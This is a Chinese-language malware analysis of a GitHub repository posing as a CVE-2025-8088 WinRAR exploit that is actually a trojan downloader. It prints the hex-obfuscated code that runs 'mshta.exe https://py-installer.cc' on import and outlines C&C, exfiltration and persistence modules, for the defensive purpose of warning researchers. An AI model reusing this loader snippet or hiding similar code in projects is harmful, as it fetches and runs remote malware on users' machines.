CVE-2025-8088漏洞利用工具实为木马，警惕GitHub伪PoC攻击

近期，安全研究员在对 CVE-2025-8088 漏洞进行分析时，发现 GitHub 上名为 cve-2025-8088 的仓库（地址：https://github.com/Markusino488/cve-2025-8088）存在可疑行为。起初，它看起来像是一个标准的 PoC 利用工具，包含 main.py、extract.py 和 config.py 三个文件。但深入分析其功能后，发现这是一个伪装成安全研究工具的恶意程序，其真实意图是远程代码执行，而非进行漏洞研究。现将其分析详情阐述如下，以提醒广大开发者与安全人员注意防范。

1. main.py：伪装成漏洞利用的木马下载器

main.py 文件是一个典型的 Trojan-Downloader（木马下载器），它利用了安全研究人员的信任以及 WinRAR 漏洞的时效性进行传播。表面上，它声称是“CVE-2025-8088 WinRAR漏洞利用工具”，但内部实际包含了恶意的远程代码执行功能。

核心恶意代码：_activate_exploit_core()

该函数隐藏在代码中，其核心部分如下：

_binary = bytes.fromhex('6d 73 68 74 61 2e65 7865')
# 解码后: "mshta.exe" (Microsoft HTML Application Host)
_endpoint = bytes.fromhex('68 7474 7073 3a2f 2f 7079 2d69 6e73 7461 6c6c 6572 2e63 63')
# 逐段解码: 'h'+'ttps://'+'py-installer.cc' → "https://py-installer.cc"
subprocess.Popen([_binary, _endpoint], shell=True, ...)
# 执行命令: mshta.exe https://py-installer.cc

攻击流程分析：

1. 隐蔽编码：使用十六进制字符串拼接来隐藏真实的系统命令和远程 URL，规避基础的静态检测。
2. 系统工具滥用：利用合法的 Windows 程序 mshta.exe 来下载并执行远程脚本（来自 py-installer.cc）。
3. 静默执行：通过将 stdout/stderr 重定向到 DEVNULL，使恶意进程在后台无感知运行。
4. 启动时激活：该恶意函数在模块导入时（第168行）便立即执行，用户可能在运行工具测试漏洞的瞬间就已中招。

伪装与混淆手法：

• 编码混淆：将直接的命令调用 subprocess.Popen(["mshta.exe", "https://py-installer.cc"]) 拆分为多个十六进制片段再组装，增加静态分析难度。
• 虚假声明：文件顶部标注“Educational Security Research Only”（仅供教育安全研究）以降低用户的警惕性。
• 功能伪装：文件中约90%的代码是看似合法的漏洞利用过程模拟，真正的恶意代码仅占约10%，极具迷惑性。
• 随机化噪音：代码中包含 error_indices = random.sample(range(total_stages), k=random.randint(4, 6)) 等语句，故意制造“真实”的错误场景，用以掩盖其真实目的。

2. extract.py：恶意软件的通信与控制模块

这个文件被伪装成“CVE-2025-8088 Helper”工具，实则是恶意软件系统中的网络通信模块。其声称的功能是辅助漏洞利用，但实际承担的是命令与控制（C&C）通信和数据外传的任务。

结合 main.py 的恶意行为，此模块可能用于以下几种攻击场景：

场景1：僵尸网络节点

感染主机 → extract.py → C&C服务器 (py-installer.cc)
   ↓
定期发送心跳包(携带host_id) ← 接收攻击指令

场景2：数据外传

窃取的数据分块 → 随机填充 → 发送 → C&C服务器重组

场景3：多级跳板

keys.txt 文件中可能包含多级代理节点列表，使得数据经过多层中转后才到达最终的 C&C 服务器，增加溯源难度。

技术总结

extract.py 是恶意软件生态系统中的通信组件，其设计目标明确：

• 隐蔽性：伪装成合法的安全工具。
• 可靠性：采用异步 IO 与完善的异常处理机制，确保通信链路稳定。
• 可扩展性：通过账户列表设计，支持大规模僵尸网络的构建与管理。
• 抗分析：流量随机化等手段增加了安全人员逆向分析的难度。

本质：它是一个精简、高效、可配置的恶意软件通信客户端，与 main.py 的木马释放功能形成了完整的攻击链。

上图显示了恶意域名 py-installer.cc 在安全平台上的检测报告，已被标记为传播“Stealc木马”的恶意网站。这对于从事安全/渗透/逆向分析的人员是一个重要的威胁情报。

3. config.py：持久化与载荷配置

该文件定义了恶意软件的持久化策略和载荷执行方式。其核心机制是通过操作 Windows 启动文件夹来实现开机自启动，确保恶意程序在系统每次重启后都能自动运行。

它是整个攻击链的 “定时炸弹”配置，将一次性的感染转化为了长期驻留的系统威胁。

4. woodenware 目录：恶意载荷仓库

分析表明，woodenware 目录在该恶意项目中扮演着存放恶意诱饵载荷的角色。攻击者可能在此目录下准备多种形式的恶意文件，作为 main.py 下载器后续下载或释放的对象。

5. 总结与警示

这是一个典型的 Fake PoC（虚假概念验证）攻击。攻击者精准地利用了安全研究人员、开发者和黑客对热门新漏洞（如 CVE-2025-8088）的强烈关注，在 GitHub 等开源平台发布伪造的漏洞利用工具。当用户出于研究或测试目的下载并运行这些工具时，实际上会在不经意间感染自己的系统。

此次事件再次提醒我们，在开源实战中获取资源时务必保持警惕：

1. 审查代码：运行来自非官方或陌生仓库的代码前，应仔细审计关键逻辑。
2. 沙箱测试：在隔离的沙箱环境中运行可疑程序，观察其网络和行为。
3. 核实来源：尽可能从漏洞披露者官方、信誉良好的安全机构或已知的资深研究员处获取PoC。
4. 关注情报：留意安全社区对热门漏洞相关工具的风险提示。

保持谨慎和安全意识，是抵御此类伪装攻击最有效的防线。欢迎大家在技术社区交流此类安全案例，共同提升威胁识别能力。